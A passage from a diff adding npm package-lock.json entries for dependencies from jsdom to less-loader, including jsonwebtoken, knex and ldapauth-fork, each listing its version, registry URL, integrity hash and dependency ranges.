"^5.0.0", + "is-potential-custom-element-name": "^1.0.1", + "nwsapi": "^2.2.0", + "parse5": "6.0.1", + "saxes": "^5.0.1", + "symbol-tree": "^3.2.4", + "tough-cookie": "^4.0.0", + "w3c-hr-time": "^1.0.2", + "w3c-xmlserializer": "^3.0.0", + "webidl-conversions": "^7.0.0", + "whatwg-encoding": "^2.0.0", + "whatwg-mimetype": "^3.0.0", + "whatwg-url": "^10.0.0", + "ws": "^8.2.3", + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=12" + }, + "peerDependencies": { + "canvas": "^2.5.0" + }, + "peerDependenciesMeta": { + "canvas": { + "optional": true + } + } + }, + "node_modules/jsdom-global": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/jsdom-global/-/jsdom-global-3.0.2.tgz", + "integrity": "sha1-a9KZwTsMRiay2iwDk81DhdYGrLk=", + "dev": true, + "peerDependencies": { + "jsdom": ">=10.0.0" + } + }, + "node_modules/jsdom/node_modules/acorn": { + "version": "8.7.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.7.0.tgz", + "integrity": "sha512-V/LGr1APy+PXIwKebEWrkZPwoeoF+w1jiOBUmuxuiUIaOHtob8Qc9BTrYo7VuI5fR8tqsy+buA2WFooR5olqvQ==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/jsdom/node_modules/tr46": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-3.0.0.tgz", + "integrity": "sha512-l7FvfAHlcmulp8kr+flpQZmVwtu7nfRV7NZujtN0OqES8EL4O4e0qqzL0DC5gAvx/ZC/9lk6rhcUwYvkBnBnYA==", + "dev": true, + "dependencies": { + "punycode": "^2.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/jsdom/node_modules/whatwg-url": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-10.0.0.tgz", + "integrity": "sha512-CLxxCmdUby142H5FZzn4D8ikO1cmypvXVQktsgosNy4a4BHrDHeciBBGZhb0bNoR5/MltoCatso+vFjjGx8t0w==", + "dev": true, + "dependencies": { + "tr46": "^3.0.0", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/jsesc": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.1.0.tgz", + "integrity": "sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==", + "dev": true, + "license": "MIT", + "bin": { + "jsesc": "bin/jsesc" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/json-bigint": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz", + "integrity": "sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==", + "dependencies": { + "bignumber.js": "^9.0.0" + } + }, + "node_modules/json-buffer": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/json-buffer/-/json-buffer-3.0.1.tgz", + "integrity": "sha512-4bV5BfR2mqfQTJm+V5tPPdf+ZpuhiIvTuAB5g8kcrXOZpTT/QwwVRWBywX1ozr6lEuPdbHxwaJlm9G6mI2sfSQ==", + "dev": true, + "peer": true + }, + "node_modules/json-parse-better-errors": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json-parse-better-errors/-/json-parse-better-errors-1.0.2.tgz", + "integrity": "sha512-mrqyZKfX5EhL7hvqcV6WG1yYjnjeuYDzDhhcAAUrq8Po85NBQBJP+ZDUT75qZQ98IkUoBqdkExkukOU7Ts2wrw==", + "dev": true + }, + "node_modules/json-parse-even-better-errors": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", + "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", + "dev": true + }, + "node_modules/json-ptr": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/json-ptr/-/json-ptr-3.1.1.tgz", + "integrity": "sha512-SiSJQ805W1sDUCD1+/t1/1BIrveq2Fe9HJqENxZmMCILmrPI7WhS/pePpIOx85v6/H2z1Vy7AI08GV2TzfXocg==" + }, + "node_modules/json-refs": { + "version": "3.0.15", + "resolved": "https://registry.npmjs.org/json-refs/-/json-refs-3.0.15.tgz", + "integrity": "sha512-0vOQd9eLNBL18EGl5yYaO44GhixmImes2wiYn9Z3sag3QnehWrYWlB9AFtMxCL2Bj3fyxgDYkxGFEU/chlYssw==", + "dependencies": { + "commander": "~4.1.1", + "graphlib": "^2.1.8", + "js-yaml": "^3.13.1", + "lodash": "^4.17.15", + "native-promise-only": "^0.8.1", + "path-loader": "^1.0.10", + "slash": "^3.0.0", + "uri-js": "^4.2.2" + }, + "bin": { + "json-refs": "bin/json-refs" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/json-refs/node_modules/argparse": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", + "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dependencies": { + "sprintf-js": "~1.0.2" + } + }, + "node_modules/json-refs/node_modules/js-yaml": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", + "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dependencies": { + "argparse": "^1.0.7", + "esprima": "^4.0.0" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/json-refs/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "engines": { + "node": ">=8" + } + }, + "node_modules/json-schema": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" + }, + "node_modules/json-schema-traverse": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", + "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" + }, + "node_modules/json-stable-stringify": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/json-stable-stringify/-/json-stable-stringify-1.1.1.tgz", + "integrity": "sha512-SU/971Kt5qVQfJpyDveVhQ/vya+5hvrjClFOcr8c0Fq5aODJjMwutrOfCU+eCnVD5gpx1Q3fEqkyom77zH1iIg==", + "dependencies": { + "call-bind": "^1.0.5", + "isarray": "^2.0.5", + "jsonify": "^0.0.1", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/json-stable-stringify-without-jsonify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", + "integrity": "sha1-nbe1lJatPzz+8wp1FC0tkwrXJlE=" + }, + "node_modules/json-stringify-safe": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", + "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" + }, + "node_modules/json2csv": { + "version": "4.5.4", + "resolved": "https://registry.npmjs.org/json2csv/-/json2csv-4.5.4.tgz", + "integrity": "sha512-YxBhY4Lmn8IvVZ36nqg5omxneLy9JlorkqW1j/EDCeqvmi+CQ4uM+wsvXlcIqvGDewIPXMC/O/oF8DX9EH5aoA==", + "dependencies": { + "commander": "^2.15.1", + "jsonparse": "^1.3.1", + "lodash.get": "^4.4.2" + }, + "bin": { + "json2csv": "bin/json2csv.js" + } + }, + "node_modules/json2csv/node_modules/commander": { + "version": "2.20.3", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==" + }, + "node_modules/json5": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", + "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", + "dev": true, + "bin": { + "json5": "lib/cli.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/jsonfile": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", + "dependencies": { + "universalify": "^2.0.0" + }, + "optionalDependencies": { + "graceful-fs": "^4.1.6" + } + }, + "node_modules/jsonify": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/jsonify/-/jsonify-0.0.1.tgz", + "integrity": "sha512-2/Ki0GcmuqSrgFyelQq9M05y7PS0mEwuIzrf3f1fPqkVDVRvZrPZtVSMHxdgo8Aq0sxAOb/cr2aqqA3LeWHVPg==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/jsonparse": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/jsonparse/-/jsonparse-1.3.1.tgz", + "integrity": "sha1-P02uSpH6wxX3EGL4UhzCOfE2YoA=", + "engines": [ + "node >= 0.2.0" + ] + }, + "node_modules/jsonwebtoken": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.2.tgz", + "integrity": "sha512-PRp66vJ865SSqOlgqS8hujT5U4AOgMfhrwYIuIhfKaoSCZcirrmASQr8CX7cUg+RMih+hgznrjp99o+W4pJLHQ==", + "dependencies": { + "jws": "^3.2.2", + "lodash.includes": "^4.3.0", + "lodash.isboolean": "^3.0.3", + "lodash.isinteger": "^4.0.4", + "lodash.isnumber": "^3.0.3", + "lodash.isplainobject": "^4.0.6", + "lodash.isstring": "^4.0.1", + "lodash.once": "^4.0.0", + "ms": "^2.1.1", + "semver": "^7.5.4" + }, + "engines": { + "node": ">=12", + "npm": ">=6" + } + }, + "node_modules/jsonwebtoken/node_modules/jwa": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/jwa/-/jwa-1.4.1.tgz", + "integrity": "sha512-qiLX/xhEEFKUAJ6FiBMbes3w9ATzyk5W7Hvzpa/SLYdxNtng+gcurvrI7TbACjIXlsJyr05/S1oUhZrc63evQA==", + "dependencies": { + "buffer-equal-constant-time": "1.0.1", + "ecdsa-sig-formatter": "1.0.11", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/jsonwebtoken/node_modules/jws": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/jws/-/jws-3.2.2.tgz", + "integrity": "sha512-YHlZCB6lMTllWDtSPHz/ZXTsi8S00usEV6v1tjq8tOUZzw7DpSDWVXjXDre6ed1w/pd495ODpHZYSdkRTsa0HA==", + "dependencies": { + "jwa": "^1.4.1", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/jsonwebtoken/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jsonwebtoken/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jsonwebtoken/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/jsprim": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", + "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + }, + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/jsprim/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/jstransformer": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/jstransformer/-/jstransformer-1.0.0.tgz", + "integrity": "sha1-7Yvwkh4vPx7U1cGkT2hwntJHIsM=", + "dependencies": { + "is-promise": "^2.0.0", + "promise": "^7.0.1" + } + }, + "node_modules/jsx-ast-utils": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/jsx-ast-utils/-/jsx-ast-utils-3.3.3.tgz", + "integrity": "sha512-fYQHZTZ8jSfmWZ0iyzfwiU4WDX4HpHbMCZ3gPlWYiCl3BoeOTsqKBqnTVfH2rYT7eP5c3sVbeSPHnnJOaTrWiw==", + "dev": true, + "dependencies": { + "array-includes": "^3.1.5", + "object.assign": "^4.1.3" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/just-debounce-it": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-debounce-it/-/just-debounce-it-1.1.0.tgz", + "integrity": "sha512-87Nnc0qZKgBZuhFZjYVjSraic0x7zwjhaTMrCKlj0QYKH6lh0KbFzVnfu6LHan03NO7J8ygjeBeD0epejn5Zcg==", + "dev": true, + "license": "MIT" + }, + "node_modules/just-extend": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/just-extend/-/just-extend-4.2.1.tgz", + "integrity": "sha512-g3UB796vUFIY90VIv/WX3L2c8CS2MdWUww3CNrYmqza1Fg0DURc2K/O4YrnklBdQarSJ/y8JnJYDGc+1iumQjg==", + "dev": true + }, + "node_modules/just-once": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-once/-/just-once-1.1.0.tgz", + "integrity": "sha512-+rZVpl+6VyTilK7vB/svlMPil4pxqIJZkbnN7DKZTOzyXfun6ZiFeq2Pk4EtCEHZ0VU4EkdFzG8ZK5F3PErcDw==", + "dev": true, + "license": "MIT" + }, + "node_modules/jwa": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/jwa/-/jwa-2.0.0.tgz", + "integrity": "sha512-jrZ2Qx916EA+fq9cEAeCROWPTfCwi1IVHqT2tapuqLEVVDKFDENFw1oL+MwrTvH6msKxsd1YTDVw6uKEcsrLEA==", + "dependencies": { + "buffer-equal-constant-time": "1.0.1", + "ecdsa-sig-formatter": "1.0.11", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/jws": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/jws/-/jws-4.0.0.tgz", + "integrity": "sha512-KDncfTmOZoOMTFG4mBlG0qUIOlc03fmzH+ru6RgYVZhPkyiy/92Owlt/8UEN+a4TXR1FQetfIpJE8ApdvdVxTg==", + "dependencies": { + "jwa": "^2.0.0", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/kareem": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/kareem/-/kareem-2.6.3.tgz", + "integrity": "sha512-C3iHfuGUXK2u8/ipq9LfjFfXFxAZMQJJq7vLS45r3D9Y2xQ/m4S8zaR4zMLFWh9AsNPXmcFfUDhTEO8UIC/V6Q==", + "license": "Apache-2.0", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/keyv": { + "version": "4.5.4", + "resolved": "https://registry.npmjs.org/keyv/-/keyv-4.5.4.tgz", + "integrity": "sha512-oxVHkHR/EJf2CNXnWxRLW6mg7JyCCUcG0DtEGmL2ctUo1PNTin1PUil+r/+4r5MpVgC/fn1kjsx7mjSujKqIpw==", + "dev": true, + "peer": true, + "dependencies": { + "json-buffer": "3.0.1" + } + }, + "node_modules/kind-of": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-6.0.3.tgz", + "integrity": "sha512-dcS1ul+9tmeD95T+x28/ehLgd9mENa3LsvDTtzm3vyBEO7RPptvAD+t44WVXaUjTBRcrpFeFlC8WCruUR456hw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/klaw": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/klaw/-/klaw-3.0.0.tgz", + "integrity": "sha512-0Fo5oir+O9jnXu5EefYbVK+mHMBeEVEy2cmctR1O1NECcCkPRreJKrS6Qt/j3KC2C148Dfo9i3pCmCMsdqGr0g==", + "dependencies": { + "graceful-fs": "^4.1.9" + } + }, + "node_modules/klaw-sync": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/klaw-sync/-/klaw-sync-6.0.0.tgz", + "integrity": "sha512-nIeuVSzdCCs6TDPTqI8w1Yre34sSq7AkZ4B3sfOBbI2CgVSB4Du4aLQijFU2+lhAFCwt9+42Hel6lQNIv6AntQ==", + "dependencies": { + "graceful-fs": "^4.1.11" + } + }, + "node_modules/kleur": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/kleur/-/kleur-4.1.5.tgz", + "integrity": "sha512-o+NO+8WrRiQEE4/7nwRJhN1HWpVmJm511pBHUxPLtp0BUISzlBplORYSmTclCnJvQq2tKu/sgl3xVpkc7ZWuQQ==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/knex": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/knex/-/knex-2.4.0.tgz", + "integrity": "sha512-i0GWwqYp1Hs2yvc2rlDO6nzzkLhwdyOZKRdsMTB8ZxOs2IXQyL5rBjSbS1krowCh6V65T4X9CJaKtuIfkaPGSA==", + "dependencies": { + "colorette": "2.0.19", + "commander": "^9.1.0", + "debug": "4.3.4", + "escalade": "^3.1.1", + "esm": "^3.2.25", + "get-package-type": "^0.1.0", + "getopts": "2.3.0", + "interpret": "^2.2.0", + "lodash": "^4.17.21", + "pg-connection-string": "2.5.0", + "rechoir": "^0.8.0", + "resolve-from": "^5.0.0", + "tarn": "^3.0.2", + "tildify": "2.0.0" + }, + "bin": { + "knex": "bin/cli.js" + }, + "engines": { + "node": ">=12" + }, + "peerDependenciesMeta": { + "better-sqlite3": { + "optional": true + }, + "mysql": { + "optional": true + }, + "mysql2": { + "optional": true + }, + "pg": { + "optional": true + }, + "pg-native": { + "optional": true + }, + "sqlite3": { + "optional": true + }, + "tedious": { + "optional": true + } + } + }, + "node_modules/knex/node_modules/commander": { + "version": "9.5.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-9.5.0.tgz", + "integrity": "sha512-KRs7WVDKg86PWiuAqhDrAQnTXZKraVcCc6vFdL14qrZ/DcWwuRo7VoiYXalXO7S5GKpqYiVEwCbgFDfxNHKJBQ==", + "engines": { + "node": "^12.20.0 || >=14" + } + }, + "node_modules/knex/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/knex/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/known-css-properties": { + "version": "0.30.0", + "resolved": "https://registry.npmjs.org/known-css-properties/-/known-css-properties-0.30.0.tgz", + "integrity": "sha512-VSWXYUnsPu9+WYKkfmJyLKtIvaRJi1kXUqVmBACORXZQxT5oZDsoZ2vQP+bQFDnWtpI/4eq3MLoRMjI2fnLzTQ==", + "dev": true, + "peer": true + }, + "node_modules/language-subtag-registry": { + "version": "0.3.21", + "resolved": "https://registry.npmjs.org/language-subtag-registry/-/language-subtag-registry-0.3.21.tgz", + "integrity": "sha512-L0IqwlIXjilBVVYKFT37X9Ih11Um5NEl9cbJIuU/SwP/zEEAbBPOnEeeuxVMf45ydWQRDQN3Nqc96OgbH1K+Pg==", + "dev": true + }, + "node_modules/language-tags": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/language-tags/-/language-tags-1.0.5.tgz", + "integrity": "sha1-0yHbxNowuovzAk4ED6XBRmH5GTo=", + "dev": true, + "dependencies": { + "language-subtag-registry": "~0.3.2" + } + }, + "node_modules/latexqc": { + "resolved": "services/latexqc", + "link": true + }, + "node_modules/launch-editor": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/launch-editor/-/launch-editor-2.10.0.tgz", + "integrity": "sha512-D7dBRJo/qcGX9xlvt/6wUYzQxjh5G1RvZPgPv8vi4KRU99DVQL/oW7tnVOCCTm2HGeo3C5HvGE5Yrh6UBoZ0vA==", + "dev": true, + "license": "MIT", + "dependencies": { + "picocolors": "^1.0.0", + "shell-quote": "^1.8.1" + } + }, + "node_modules/lazy-ass": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/lazy-ass/-/lazy-ass-1.6.0.tgz", + "integrity": "sha1-eZllXoZGwX8In90YfRUNMyTVRRM=", + "dev": true, + "engines": { + "node": "> 0.8" + } + }, + "node_modules/lazystream": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/lazystream/-/lazystream-1.0.1.tgz", + "integrity": "sha512-b94GiNHQNy6JNTrt5w6zNyffMrNkXZb3KTkCZJb2V1xaEGCk093vkZ2jk3tpaeP33/OiXC+WvK9AxUebnf5nbw==", + "dependencies": { + "readable-stream": "^2.0.5" + }, + "engines": { + "node": ">= 0.6.3" + } + }, + "node_modules/lazystream/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": "sha1-u5NdSFgsuhaMBoNJV6VKPgcSTxE=" + }, + "node_modules/lazystream/node_modules/readable-stream": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.7.tgz", + "integrity": "sha512-Ebho8K4jIbHAxnuxi7o42OrZgF/ZTNcsZj6nRKyUmkhLFq8CHItp/fy6hQZuZmP/n3yZ9VBUbp4zz/mX8hmYPw==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/lazystream/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/ldap-filter": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/ldap-filter/-/ldap-filter-0.2.2.tgz", + "integrity": "sha1-8rhCvguG2jNSeYUFsx68rlkNd9A=", + "dependencies": { + "assert-plus": "0.1.5" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/ldapauth-fork": { + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/ldapauth-fork/-/ldapauth-fork-4.3.3.tgz", + "integrity": "sha512-x76VpQ5ZqkwAJmqwcD6KIwDiNEbgIGIPGwC/eA17e1dxWhlTx36w0DlLOFwjTuZ2iuaLTsZsUprlVqvSlwc/1Q==", + "dependencies": { + "@types/ldapjs": "^1.0.0", + "@types/node": "*", + "bcryptjs": "^2.4.0", + "ldapjs": "^1.0.2", + "lru-cache": "^5.1.1" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/ldapauth-fork/node_modules/asn1": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.3.tgz", + "integrity": "sha1-2sh4dxPJlmhJ/IGAd36+nB3fO4Y=" + }, + "node_modules/ldapauth-fork/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/ldapauth-fork/node_modules/extsprintf": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.2.0.tgz", + "integrity": "sha1-WtlGwi9bMrp/jNdCZxHG6KP8JSk=", + "engines": [ + "node >=0.6.0" + ] + }, + "node_modules/ldapauth-fork/node_modules/ldapjs": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/ldapjs/-/ldapjs-1.0.2.tgz", + "integrity": "sha1-VE/3Ayt7g8aPBwEyjZKXqmlDQPk=", + "dependencies": { + "asn1": "0.2.3", + "assert-plus": "^1.0.0", + "backoff": "^2.5.0", + "bunyan": "^1.8.3", + "dashdash": "^1.14.0", + "ldap-filter": "0.2.2", + "once": "^1.4.0", + "vasync": "^1.6.4", + "verror": "^1.8.1" + }, + "bin": { + "ldapjs-add": "bin/ldapjs-add", + "ldapjs-compare": "bin/ldapjs-compare", + "ldapjs-delete": "bin/ldapjs-delete", + "ldapjs-modify": "bin/ldapjs-modify", + "ldapjs-search": "bin/ldapjs-search" + }, + "engines": { + "node": ">=0.10" + }, + "optionalDependencies": { + "dtrace-provider": "~0.8" + } + }, + "node_modules/ldapauth-fork/node_modules/vasync": { + "version": "1.6.4", + "resolved": "https://registry.npmjs.org/vasync/-/vasync-1.6.4.tgz", + "integrity": "sha1-3+k2Fq0OeugBszKp2Iv8XNyOHR8=", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "verror": "1.6.0" + } + }, + "node_modules/ldapauth-fork/node_modules/vasync/node_modules/verror": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/verror/-/verror-1.6.0.tgz", + "integrity": "sha1-fROyex+swuLakEBetepuW90lLqU=", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "extsprintf": "1.2.0" + } + }, + "node_modules/lead": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/lead/-/lead-4.0.0.tgz", + "integrity": "sha512-DpMa59o5uGUWWjruMp71e6knmwKU3jRBBn1kjuLWN9EeIOxNeSAwvHf03WIl8g/ZMR2oSQC9ej3yeLBwdDc/pg==", + "dev": true, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/less": { + "version": "3.13.1", + "resolved": "https://registry.npmjs.org/less/-/less-3.13.1.tgz", + "integrity": "sha512-SwA1aQXGUvp+P5XdZslUOhhLnClSLIjWvJhmd+Vgib5BFIr9lMNlQwmwUNOjXThF/A0x+MCYYPeWEfeWiLRnTw==", + "dev": true, + "dependencies": { + "copy-anything": "^2.0.1", + "tslib": "^1.10.0" + }, + "bin": { + "lessc": "bin/lessc" + }, + "engines": { + "node": ">=6" + }, + "optionalDependencies": { + "errno": "^0.1.1", + "graceful-fs": "^4.1.2", + "image-size": "~0.5.0", + "make-dir": "^2.1.0", + "mime": "^1.4.1", + "native-request": "^1.0.5", + "source-map": "~0.6.0" + } + }, + "node_modules/less-loader": { + "version": "11.1.3", + "resolved": "https://registry.npmjs.org/less-loader/-/less-loader-11.1.3.tgz", + "integrity": "sha512-A5b7O8dH9xpxvkosNrP0dFp2i/dISOJa9WwGF3WJflfqIERE2ybxh1BFDj5CovC2+jCE4M354mk90hN6ziXlVw==", + "dev": true, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "less": "^3.5.0 || ^4.0.0", + "webpack": 